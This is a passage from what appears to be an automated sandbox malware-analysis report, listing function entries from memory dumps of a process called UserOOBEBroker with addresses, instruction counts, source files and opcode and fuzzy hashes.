                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B773000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B773000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b773000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 11cb22775628acb1e462abcd821d034bf3409d2e5580556550d3f9fbfff517ed
                                                                                                                            • Instruction ID: 90f08ed0d39a2fc7429362b75e9bcd5732cda49565e5211b078be1b54e568e7e
                                                                                                                            • Opcode Fuzzy Hash: 11cb22775628acb1e462abcd821d034bf3409d2e5580556550d3f9fbfff517ed
                                                                                                                            • Instruction Fuzzy Hash: DDA1B330B19A4D9FDB58EF68C4A4AB977E1FF58310B5106B9E01EC32E6CE35A842C741
                                                                                                                            Function 00007FFD9B78317D Relevance: .3, Instructions: 287COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5c27df316ca98a24141245542966e1baa236cbb1a433f2958d5b27a50488872d
                                                                                                                            • Instruction ID: a6e7dab2b2cddd30f86e1b7fe32b9b84e49b1a8ae6b4f8a767d4deba69ac47c0
                                                                                                                            • Opcode Fuzzy Hash: 5c27df316ca98a24141245542966e1baa236cbb1a433f2958d5b27a50488872d
                                                                                                                            • Instruction Fuzzy Hash: 7F910761B1DE4E0FEB98EA6C84B667573C2EF98341F0542B9E40DC71E7DD3869458381
                                                                                                                            Function 00007FFD9B782111 Relevance: .1, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7055ff8a5ffb9bef93d092b96aab0fb5d411dbe686a64b596fdba19ff79009e2
                                                                                                                            • Instruction ID: 22858d2a34da8d0b4173d908263883513da7b4fd1cf5a81f3476849680cfb11e
                                                                                                                            • Opcode Fuzzy Hash: 7055ff8a5ffb9bef93d092b96aab0fb5d411dbe686a64b596fdba19ff79009e2
                                                                                                                            • Instruction Fuzzy Hash: 93314931A0DA4D8FE729DB58C8A4BF53791EB95311F0602BED41DC72E2DE786D818781
                                                                                                                            Function 00007FFD9B75116D Relevance: .1, Instructions: 95COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3649281347cef4b102f7a5f8d01b3a21de6fbfba7e1cfdb4aa9ef3dee47c4167
                                                                                                                            • Instruction ID: 45f6140b53160f6220eab25b36807e2105bef01f46f510a382669616ea4f3f02
                                                                                                                            • Opcode Fuzzy Hash: 3649281347cef4b102f7a5f8d01b3a21de6fbfba7e1cfdb4aa9ef3dee47c4167
                                                                                                                            • Instruction Fuzzy Hash: 5331A931A0964D8FDB55EBA8C865DBD77F0FF26300F0506FAC00AD75B2DA68A941C750
                                                                                                                            Function 00007FFD9B78D621 Relevance: .1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a2fb0e51bd17b0b7bb46c198e5fe1133e7cefa2539493a7e940ce648adb5b4c2
                                                                                                                            • Instruction ID: 9267584b6e933159c5012fe6e3658ed6f6df08cbf470457681c3740a793af93b
                                                                                                                            • Opcode Fuzzy Hash: a2fb0e51bd17b0b7bb46c198e5fe1133e7cefa2539493a7e940ce648adb5b4c2
                                                                                                                            • Instruction Fuzzy Hash: 5D212432F09A5D4FEB24DA68D8A46ED77E1EB98311F0506BBD019D32E1DE389E4187C0
                                                                                                                            Function 00007FFD9B750C25 Relevance: .1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6e5f036a23f496bf6eb0487f7733b785f5abd5e9ff219fe57e2ddd31d7bb5d54
                                                                                                                            • Instruction ID: 1a1af83695c867b5f91984fb12c8c53fa0a8808c7327c067cf9a8265e31af2cf
                                                                                                                            • Opcode Fuzzy Hash: 6e5f036a23f496bf6eb0487f7733b785f5abd5e9ff219fe57e2ddd31d7bb5d54
                                                                                                                            • Instruction Fuzzy Hash: 4B21E736B0D38D9FE722A7E898650EC7B60EF43320F1546B7D048DB1E3DA6826478795
                                                                                                                            Function 00007FFD9B76B402 Relevance: .1, Instructions: 79COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9cb38906ba031d0e968ee2b8c120f6eda587408b749160d700c8bb5c86f8589b
                                                                                                                            • Instruction ID: 23f3fe59ba3aa8bdb83f501ce6ec20b9bacd49ab8a8ce833726c70796e78ebd1
                                                                                                                            • Opcode Fuzzy Hash: 9cb38906ba031d0e968ee2b8c120f6eda587408b749160d700c8bb5c86f8589b
                                                                                                                            • Instruction Fuzzy Hash: 50217421B0DE0ECFF7B4AA6884A56B937D1EB98310F150679C40DD72F6DE28AD025781
                                                                                                                            Function 00007FFD9B78185D Relevance: .1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fd75678151f1391306a4a8c670cebd492578cd72552bf8e7532b4c99c6c1c1f8
                                                                                                                            • Instruction ID: eba22ee733e26221f1a121bd6226600d86c1e90e67d853e670dbceda958f224d
                                                                                                                            • Opcode Fuzzy Hash: fd75678151f1391306a4a8c670cebd492578cd72552bf8e7532b4c99c6c1c1f8
                                                                                                                            • Instruction Fuzzy Hash: 86016161E1CA854BE718AB1CA46A37937D1EB9CB09F54027CF48ED32D7DF385906424B
                                                                                                                            Function 00007FFD9B750C38 Relevance: .1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3b0c2ffa6665a2df569256c7fbe9d791df5440899799b91f48487b717e2f3720
                                                                                                                            • Instruction ID: faeafb706778a015d3b18950af121ad0ab43dea44d1751fe1d0972b0ac955fa4
                                                                                                                            • Opcode Fuzzy Hash: 3b0c2ffa6665a2df569256c7fbe9d791df5440899799b91f48487b717e2f3720
                                                                                                                            • Instruction Fuzzy Hash: 44119E35A0E38D9FE722DBA888650ED7BB0AF43610F0646B7D084DB1E2D974264A8780
                                                                                                                            Function 00007FFD9B78AD4D Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4253b906e68100d59aa7205550b285342e6dacdd2aef26010dcb890bb3a529c4
                                                                                                                            • Instruction ID: faacd56778a16b632925e33c46907bc61055075c34800383b017b6ab5dc2d5a3
                                                                                                                            • Opcode Fuzzy Hash: 4253b906e68100d59aa7205550b285342e6dacdd2aef26010dcb890bb3a529c4
                                                                                                                            • Instruction Fuzzy Hash: 3D018171B0AE0D4FEB95E79894A67F9B3D2EF58352F050176E40CC32A2DE2468458751
                                                                                                                            Function 00007FFD9B76B46D Relevance: .0, Instructions: 43COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1ca594dbbe3c49477fae9e4bf32edaacae0ee98b5543cccad94c8805daa9fa69
                                                                                                                            • Instruction ID: 53cdb1f8319d951cdef9655b717c02c1c6a971a07a89fd1e7f89b922a17de376
                                                                                                                            • Opcode Fuzzy Hash: 1ca594dbbe3c49477fae9e4bf32edaacae0ee98b5543cccad94c8805daa9fa69
                                                                                                                            • Instruction Fuzzy Hash: 2DF08652B0EF4E8FEAF4DE6C88916A53BD2FB983107050675D00DD32A6D924ED024782
                                                                                                                            Function 00007FFD9B750C48 Relevance: .0, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 49936b6887795164c907375ee1043e405fcf8e3bb14fd87297b1444699e50a44
                                                                                                                            • Instruction ID: 764f6ec27531d70b7f22d004b3e76a1536ab465e7ff752a3a120844df79a9697
                                                                                                                            • Opcode Fuzzy Hash: 49936b6887795164c907375ee1043e405fcf8e3bb14fd87297b1444699e50a44
                                                                                                                            • Instruction Fuzzy Hash: 45018035A0E38D8FE712DBA4886109C7FB0AF43700F1646E7D044DB1E2DA746A468741
                                                                                                                            Function 00007FFD9B750C50 Relevance: .0, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 00bb79627ce4cc3d657452bed5adbb0d1c07d38387a2acc6d886136808c16a50
                                                                                                                            • Instruction ID: a2c3fe6029a1f6146dec0c41b54f228449e13c5c2fe626109115673607463086
                                                                                                                            • Opcode Fuzzy Hash: 00bb79627ce4cc3d657452bed5adbb0d1c07d38387a2acc6d886136808c16a50
                                                                                                                            • Instruction Fuzzy Hash: 6D017C34E0E38D9FE722DBA488640AD7FB0AF03700F1546E7D044DB2A6DA786A458741
                                                                                                                            Function 00007FFD9B78A9D9 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 08160cbf032374ae9cd85adb820dc827688597489ccf39b1adcbe36d234afb8d
                                                                                                                            • Instruction ID: 3ba6d96ca373a907103ad4dfe84825b2fcd9e9363ddd887cde927556bd9ea639
                                                                                                                            • Opcode Fuzzy Hash: 08160cbf032374ae9cd85adb820dc827688597489ccf39b1adcbe36d234afb8d
                                                                                                                            • Instruction Fuzzy Hash: 1CF0E521B5D7C40FCB1A562958654617BF1CF9B20534A41FBD496CB2E3DD18AC858391
                                                                                                                            Function 00007FFD9B755E02 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fba45e7a3abb507e03c9bb2b7cbe853e30884caec520699866bf74d8c9ca86dc
                                                                                                                            • Instruction ID: d24bf6caec443c0520c6eb081efdad252ff0ff46093cd670936f1d7abc92b4be
                                                                                                                            • Opcode Fuzzy Hash: fba45e7a3abb507e03c9bb2b7cbe853e30884caec520699866bf74d8c9ca86dc
                                                                                                                            • Instruction Fuzzy Hash: D2F0C231648A098FCB54DF04C494FA973B1FB98311F1586A9D00ED7260DA74AA85DF81
                                                                                                                            Function 00007FFD9B764B7A Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f747cd76a50f8eaafc175bb5992f446a053f3789100cc4f1f6c70f3d0c472a88
                                                                                                                            • Instruction ID: 9aec045372e059132930c7e7f78aed666e650d7bce46698836017d2841428c5c
                                                                                                                            • Opcode Fuzzy Hash: f747cd76a50f8eaafc175bb5992f446a053f3789100cc4f1f6c70f3d0c472a88
                                                                                                                            • Instruction Fuzzy Hash: 86F0B430B0E21E8FEA74AE88D4605B83350EF54310F020379D41EC31FBCD28AA035285
                                                                                                                            Function 00007FFD9B78B7B0 Relevance: .0, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5d910dbd57608b0abda037d5b4e092c3ef62f7276750041a1f9a72b9373180bf
                                                                                                                            • Instruction ID: 3fc26efb41ea21597473b492dc982bc38c751d7889ca7c30a5cca1327ef75f52
                                                                                                                            • Opcode Fuzzy Hash: 5d910dbd57608b0abda037d5b4e092c3ef62f7276750041a1f9a72b9373180bf
                                                                                                                            • Instruction Fuzzy Hash: 89F0E526B586024FD308BB3CE8B68F83390EF5222674840F6E04ECE1E7DE29D4488A41
                                                                                                                            Function 00007FFD9B7822DA Relevance: .0, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bbb1bc1652a36375c6ad660f0ccf73b1d72b647a5ad71953fb61daeba29dcdd9
                                                                                                                            • Instruction ID: 88a140230210a74c5aebdc02f6bcb2a3807ea0bdfc79b0a21d442a5410178b0a
                                                                                                                            • Opcode Fuzzy Hash: bbb1bc1652a36375c6ad660f0ccf73b1d72b647a5ad71953fb61daeba29dcdd9
                                                                                                                            • Instruction Fuzzy Hash: 24F0A732F0990D8BEB94DE48C4A42E93395EB94312B124366C45AC72A5C934ED418BC0
                                                                                                                            Function 00007FFD9B77CB49 Relevance: .0, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B773000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B773000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b773000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 51f3c7e256b92e4705a4fc7e29e1d2a74564b146bf7ea8aa7a63253ae12bd6fe
                                                                                                                            • Instruction ID: f6c8a3eb7c5cda0199f8ef649c846817f0739b2c7cc1187b7422e2492db01605
                                                                                                                            • Opcode Fuzzy Hash: 51f3c7e256b92e4705a4fc7e29e1d2a74564b146bf7ea8aa7a63253ae12bd6fe
                                                                                                                            • Instruction Fuzzy Hash: D7F0396096D7C54FC702AB3888644247FF0EF1710978A02EBD8C9CA4B3DA19884AC312
                                                                                                                            Function 00007FFD9B782CE9 Relevance: .0, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9d9a2094f2d8b6685660e773d458ab3562149265bbdb5a1560ed5c07b140fd65
                                                                                                                            • Instruction ID: 4bc0b4ca295e60b962178d6091dcb4e2a5ab8a4765626c407b31a3bb1d2156b4
                                                                                                                            • Opcode Fuzzy Hash: 9d9a2094f2d8b6685660e773d458ab3562149265bbdb5a1560ed5c07b140fd65
                                                                                                                            • Instruction Fuzzy Hash: 33E0922070AB890FC70E963848685607FA1EF6610178942EBC445CF1E3DD19DC89C751
                                                                                                                            Function 00007FFD9B77E279 Relevance: .0, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B773000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B773000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b773000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 56720f9561f3326d6ca09ea0d49ffe7035577743b517bc5fad30eb9a1ececbca
                                                                                                                            • Instruction ID: ebc221aa116818720a8d9470321270875e18592448059e6f77a2adb843b7b3cd
                                                                                                                            • Opcode Fuzzy Hash: 56720f9561f3326d6ca09ea0d49ffe7035577743b517bc5fad30eb9a1ececbca
                                                                                                                            • Instruction Fuzzy Hash: E8E09220B597C80FC70E963848645607FA1EF5710678952FAC845CB1D3E919DC89C751
                                                                                                                            Function 00007FFD9B7879D5 Relevance: .0, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1f1b36cf6e6d68fd3653b6a98a1aa01873a78dde0981d82731e6bbd0d9db0483
                                                                                                                            • Instruction ID: a6a6bd39aaf03454348f52f04105c296cb11034421ac7d5e0170d7e89082d67c
                                                                                                                            • Opcode Fuzzy Hash: 1f1b36cf6e6d68fd3653b6a98a1aa01873a78dde0981d82731e6bbd0d9db0483
                                                                                                                            • Instruction Fuzzy Hash: 62E02B22B0EB845FD3194A384CB54643B51CF2B12671B01A7D016CB5F3D8159D44C341
                                                                                                                            Function 00007FFD9B78AA69 Relevance: .0, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f4ef3649280878cc5f3aaf52da19a1819bd6fc5e1659fe3c3163c55e0b28476d
                                                                                                                            • Instruction ID: e3d1a1da7d9074f4fb116f113377fb06fd6e116f2030fb6ca87564f11e9e5bbb
                                                                                                                            • Opcode Fuzzy Hash: f4ef3649280878cc5f3aaf52da19a1819bd6fc5e1659fe3c3163c55e0b28476d
                                                                                                                            • Instruction Fuzzy Hash: 29E08621A597C44FCB0EA73888A59503FB0DF6B11178A40EAD049CF1F3D51DDC49C751
                                                                                                                            Function 00007FFD9B779599 Relevance: .0, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B773000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B773000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b773000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 31e7add6a699482644e09eac890c158adb20630c39a971166cf3560001b36da7
                                                                                                                            • Instruction ID: faaa01827a3640a0992ef8394f799f36f8611ed61ef1185c30327ee6dd8f7827
                                                                                                                            • Opcode Fuzzy Hash: 31e7add6a699482644e09eac890c158adb20630c39a971166cf3560001b36da7
                                                                                                                            • Instruction Fuzzy Hash: 2FE08631A497844FCB0AAB288CA99503BB0EF6A215B8A00D7C005CB5B3E61DDC49C701
                                                                                                                            Function 00007FFD9B787989 Relevance: .0, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c964d85cdf1dee93cba477832f5b26ba886b4bc37cd490a501a1f3da30a6a0c8
                                                                                                                            • Instruction ID: 41a6ac8204fcf201e5012ef7529e6b21993cdb5295be08fadcd5c78c61696277
                                                                                                                            • Opcode Fuzzy Hash: c964d85cdf1dee93cba477832f5b26ba886b4bc37cd490a501a1f3da30a6a0c8
                                                                                                                            • Instruction Fuzzy Hash: 6CE01A2194F7C08FC74B9B3588A88447F71AE1721174A51EBC086CF5B3EA299849C712
                                                                                                                            Function 00007FFD9B78D959 Relevance: .0, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5c5da26b0122ceb7ea3b42c453a36d5338c0b8dfb9c39f322118e7ad536636e7
                                                                                                                            • Instruction ID: adbb791bfe44542853f887c2af0a5f1d3afa8ffe0c0f8fa97680d4350e7a0e40
                                                                                                                            • Opcode Fuzzy Hash: 5c5da26b0122ceb7ea3b42c453a36d5338c0b8dfb9c39f322118e7ad536636e7
                                                                                                                            • Instruction Fuzzy Hash: 69E04F2164A7C00FC70E963488658543FA09F5711178A40EBC045CF2F3D519D848C752
                                                                                                                            Function 00007FFD9B78A540 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                            Function 00007FFD9B78A4B0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
